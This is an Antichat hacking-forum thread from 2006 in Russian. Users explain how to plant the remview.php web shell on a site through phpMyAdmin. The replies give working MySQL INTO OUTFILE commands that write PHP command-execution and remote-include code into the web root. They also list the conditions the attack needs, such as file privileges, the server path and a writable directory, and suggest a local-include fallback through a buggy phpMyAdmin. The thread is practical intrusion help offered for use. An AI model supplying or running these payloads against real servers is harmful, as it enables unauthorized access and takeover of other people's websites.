Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Залить remview.php через phpMyAdmin (https://forum.antichat.xyz/showthread.php?t=13933)

Grom 03.02.2006 23:32

Залить remview.php через phpMyAdmin
 
Есть доступ к phpmyadmin, как залить remview.php на сайт?
Заранее благодарен!

madnet 04.02.2006 03:20

select запись с шелом into outfile 'path_to_file/file.php'

Grom 04.02.2006 10:29

А можно поконкретней, пожалуйста?

SanyaX 04.02.2006 13:17

INSERT INTO table VALUES(7777777, 0, "<? system($e); ?>", 0)
SELECT * FROM table WHERE (param1 = 7777777) INTO OUTFILE /home/site/www/shell.php
Если не прав поправте.

Grom 04.02.2006 14:14

Ругается на ошибку "1064: you have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'table VALUES(7777777, 0, "<? system($e); ?>", 0)
SELECT * FROM"

limpompo 04.02.2006 14:34

Подумай сам.... что это может быть.. запрос тебе дали...Или ты хочешь чтобы дебе Полные права дали на Этой тачке? Гы... Иногда надо думать головой...

Trinux 04.02.2006 15:26

Вообще phpMyAdmin тут не причем, есть он или нет его - не имеет значения. Ну... практически =) Дело в MySQL. Но чтобы залить файл, тот же шелл, на хостинг тебе потребуется следующее:

1) Включенные MySQL файловые функции (а их почти все вырубают для безопасности)
2) Знать полный адрес от корня файловой системы до web контента
3) Иметь в вебе диру с 0770 или 0777 чмодом
4) Выучить скуль =)

2 SanyaX
значение INTO OUTFILE ковычками обособляется =)

Ekib 04.02.2006 18:54

Вот так надо:
CREATE TABLE `shell` (`script` TEXT NOT NULL) COMMENT = 'table for include';
INSERT INTO `shell` ( `script` ) VALUES ('<? phpcode(); ?>');
SELECT script FROM `shell` INTO OUTFILE '/home/localhost/www/shell.php';
DROP TABLE `shell`;
Вместо <? phpcode(); ?> пишешь код шелла или <? include($_GET[‘shell’]); ?> а потом переходишь на http://victimsite.com/shell.php?shel...ru/remview.php
Никаких кавычек в INTO OUTFILE не надо. Только права должны быть рутовые...

ShAnKaR 05.02.2006 00:19

если нет возможности в веб дирриктории создать файлик то можно поробовать в тмп и если phpmyadmin бажная(кажись это 2.6.*, или ещё какие, точно не помню) то проинклудить локально с её помощью, вотъ

P.S.
а файлик так создаем :
select '<? phpinfo(); ?>' from test into outfile '/tmp/ddd'


Время: 05:45